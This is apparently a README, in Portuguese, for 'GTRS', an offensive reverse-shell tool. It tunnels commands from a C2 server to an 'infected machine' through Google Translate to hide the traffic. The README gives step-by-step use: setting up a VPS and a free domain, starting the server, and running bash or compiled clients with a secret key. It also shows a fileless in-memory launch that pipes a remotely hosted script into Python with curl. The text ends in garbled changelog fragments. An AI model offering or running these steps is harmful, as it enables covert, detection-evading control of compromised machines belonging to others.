
GTRS - Google Tradutor Reverse Shell
Esta ferramenta usa o Google Tradutor como um proxy para enviar comandos arbitrários a uma máquina infectada.
[MÁQUINA INFECTADA] ==HTTPS==> [GOOGLE TRADUTOR] ==HTTP==> [C2]
Primeiro você precisa de um VPS e um domínio; para o domínio, você pode obter um gratuito no Freenom.
Inicie o server.py no seu VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Ele fornecerá uma chave secreta que será usada no cliente.
Execute o cliente em um computador com acesso ao Google Tradutor, fornecendo o domínio e a chave secreta gerada pelo servidor.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Agora você tem um shell interativo usando arquivos named pipe, SIM você pode usar cd em diretórios.
Primeiro você precisa baixar o binário ou compilá-lo, então o processo é igual ao do cliente bash,
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Com este cliente você tem a capacidade de executá-lo no Linux, Mac e Windows, mas o cliente ainda não possui um shell interativo.
Após ler este blogpost, fiz uma adaptação simples para executar o GTRS em memória, basta editar o host e a chave no script inmemory-linux.py, então hospede-o em um servidor e faça curl.
curl https://yourserver.ml/inmemory-linux.py | python
Ou você pode hospedar o script usando a abordagem do youtube.
CODE_IS_CHEAP_SHOW_ME_THE_DEMO
.bashrc.Problem fixed using User-Agent header to sent data.xmllint que está em libxml2-utilsProblem fixed, now the client is write also in go.